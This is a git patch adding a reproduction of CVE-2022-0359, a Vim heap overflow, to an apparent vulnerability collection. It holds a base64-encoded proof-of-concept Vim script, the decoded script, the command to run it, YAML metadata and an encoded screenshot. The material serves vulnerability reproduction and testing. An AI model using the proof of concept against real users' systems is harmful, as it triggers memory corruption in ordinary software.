From 7cdb6b42587d5283c241cd64ea8f5b2c4559ed7c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=96=87=E6=9D=B0?= <liwenjie@kylinos.cn>
Date: Fri, 21 Oct 2022 15:00:16 +0800
Subject: [PATCH] add CVE-2022-0359

---
 cve/vim/2022/CVE-2022-0359/README.md          |   7 ++++++
 cve/vim/2022/CVE-2022-0359/heap_ow_poc1       |   4 ++++
 .../2022/CVE-2022-0359/png/CVE-2022-0359.png  | Bin 0 -> 19203 bytes
 cve/vim/2022/yaml/CVE-2022-0359.yaml          |  20 ++++++++++++++++++
 vulnerability_list.yaml                       |   4 +++-
 5 files changed, 34 insertions(+), 1 deletion(-)
 create mode 100644 cve/vim/2022/CVE-2022-0359/README.md
 create mode 100644 cve/vim/2022/CVE-2022-0359/heap_ow_poc1
 create mode 100644 cve/vim/2022/CVE-2022-0359/png/CVE-2022-0359.png
 create mode 100644 cve/vim/2022/yaml/CVE-2022-0359.yaml

diff --git a/cve/vim/2022/CVE-2022-0359/README.md b/cve/vim/2022/CVE-2022-0359/README.md
new file mode 100644
index 00000000..68534a6d
--- /dev/null
+++ b/cve/vim/2022/CVE-2022-0359/README.md
@@ -0,0 +1,7 @@
+### 漏洞复现
+```shell
+echo -n cmV0ODAwCnMvXHYvCQpzZSBhaQpzaWwwbm9ybTppDQ== | base64 -d > heap_ow_poc1
+vim -u NONE -i NONE -n -X -Z -e -m -s -S heap_ow_poc1 -c :qa!
+```
+![](./png/CVE-2022-0359.png)
+
diff --git a/cve/vim/2022/CVE-2022-0359/heap_ow_poc1 b/cve/vim/2022/CVE-2022-0359/heap_ow_poc1
new file mode 100644
index 00000000..44b8b065
--- /dev/null
+++ b/cve/vim/2022/CVE-2022-0359/heap_ow_poc1
@@ -0,0 +1,4 @@
+ret800
+s/\v/	
+se ai
+sil0norm:i
\ No newline at end of file
diff --git a/cve/vim/2022/CVE-2022-0359/png/CVE-2022-0359.png b/cve/vim/2022/CVE-2022-0359/png/CVE-2022-0359.png
new file mode 100644
index 0000000000000000000000000000000000000000..42b5dbfd04b9444dce5260f8bf4f99e5569eda28
GIT binary patch
literal 19203
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
